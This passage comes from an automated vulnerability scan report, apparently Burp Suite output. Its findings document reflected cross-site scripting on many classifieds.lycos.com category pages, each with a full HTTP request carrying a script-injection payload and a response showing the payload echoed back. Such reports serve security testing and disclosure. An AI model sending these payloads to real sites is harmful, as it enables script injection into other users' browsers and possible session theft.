<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-roommates/?4386a"><script>alert(1)</script>53f51d5a76c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.41. http://classifieds.lycos.com/housing-rent-short_term/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-short_term/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc0f"><script>alert(1)</script>175eb4ee6b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-short_term8fc0f"><script>alert(1)</script>175eb4ee6b6/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-short_term8fc0f"><script>alert(1)</script>175eb4ee6b6/?mobile=1" rel="nofollow">
...[SNIP]...

1.42. http://classifieds.lycos.com/housing-rent-short_term/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-short_term/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b35"><script>alert(1)</script>0ac4ae6fe4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-short_term/?35b35"><script>alert(1)</script>0ac4ae6fe4a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:08:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-short_term/?35b35"><script>alert(1)</script>0ac4ae6fe4a=1&mobile=1" rel="nofollow">
...[SNIP]...

1.43. http://classifieds.lycos.com/housing-rent-storage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-storage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7462"><script>alert(1)</script>626ed5a3760 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-storagef7462"><script>alert(1)</script>626ed5a3760/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-storagef7462"><script>alert(1)</script>626ed5a3760/?mobile=1" rel="nofollow">
...[SNIP]...

1.44. http://classifieds.lycos.com/housing-rent-storage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-storage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 442de"><script>alert(1)</script>f19e288b98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-storage/?442de"><script>alert(1)</script>f19e288b98e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-storage/?442de"><script>alert(1)</script>f19e288b98e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.45. http://classifieds.lycos.com/housing-rent-vacation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-vacation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c00ba"><script>alert(1)</script>d88c6e18e37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-vacationc00ba"><script>alert(1)</script>d88c6e18e37/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-vacationc00ba"><script>alert(1)</script>d88c6e18e37/?mobile=1" rel="nofollow">
...[SNIP]...

1.46. http://classifieds.lycos.com/housing-rent-vacation/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-vacation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec671"><script>alert(1)</script>db069009273 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-vacation/?ec671"><script>alert(1)</script>db069009273=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-vacation/?ec671"><script>alert(1)</script>db069009273=1&mobile=1" rel="nofollow">
...[SNIP]...

1.47. http://classifieds.lycos.com/housing-rent/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c99"><script>alert(1)</script>f65348401a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent46c99"><script>alert(1)</script>f65348401a7/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent46c99"><script>alert(1)</script>f65348401a7/?mobile=1" rel="nofollow">
...[SNIP]...

1.48. http://classifieds.lycos.com/housing-rent/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f09c9"><script>alert(1)</script>26479ec3b01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent/?f09c9"><script>alert(1)</script>26479ec3b01=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:58:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent/?f09c9"><script>alert(1)</script>26479ec3b01=1&mobile=1" rel="nofollow">
...[SNIP]...

1.49. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-office_space/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92d68"><script>alert(1)</script>3441bd28421 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-office_space92d68"><script>alert(1)</script>3441bd28421/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:16:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-office_space92d68"><script>alert(1)</script>3441bd28421/?mobile=1" rel="nofollow">
...[SNIP]...

1.50. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-office_space/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db56c"><script>alert(1)</script>b3c0518ee36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-office_space/?db56c"><script>alert(1)</script>b3c0518ee36=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:46 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-office_space/?db56c"><script>alert(1)</script>b3c0518ee36=1&mobile=1" rel="nofollow">
...[SNIP]...

1.51. http://classifieds.lycos.com/housing-sale-commercial-retail/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-retail/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d27"><script>alert(1)</script>55e8d8a9b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-retail40d27"><script>alert(1)</script>55e8d8a9b44/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-retail40d27"><script>alert(1)</script>55e8d8a9b44/?mobile=1" rel="nofollow">
...[SNIP]...

1.52. http://classifieds.lycos.com/housing-sale-commercial-retail/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-retail/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45891"><script>alert(1)</script>6e1973139bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-retail/?45891"><script>alert(1)</script>6e1973139bc=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-retail/?45891"><script>alert(1)</script>6e1973139bc=1&mobile=1" rel="nofollow">
...[SNIP]...

1.53. http://classifieds.lycos.com/housing-sale-condo/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-condo/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b172"><script>alert(1)</script>ee6728714e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-condo7b172"><script>alert(1)</script>ee6728714e9/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-condo7b172"><script>alert(1)</script>ee6728714e9/?mobile=1" rel="nofollow">
...[SNIP]...

1.54. http://classifieds.lycos.com/housing-sale-condo/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-condo/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bd5"><script>alert(1)</script>cc3baf59798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-condo/?51bd5"><script>alert(1)</script>cc3baf59798=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-condo/?51bd5"><script>alert(1)</script>cc3baf59798=1&mobile=1" rel="nofollow">
...[SNIP]...

1.55. http://classifieds.lycos.com/housing-sale-foreclosure/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-foreclosure/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc5c"><script>alert(1)</script>96d5591b8e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-foreclosure7dc5c"><script>alert(1)</script>96d5591b8e9/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-foreclosure7dc5c"><script>alert(1)</script>96d5591b8e9/?mobile=1" rel="nofollow">
...[SNIP]...

1.56. http://classifieds.lycos.com/housing-sale-foreclosure/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
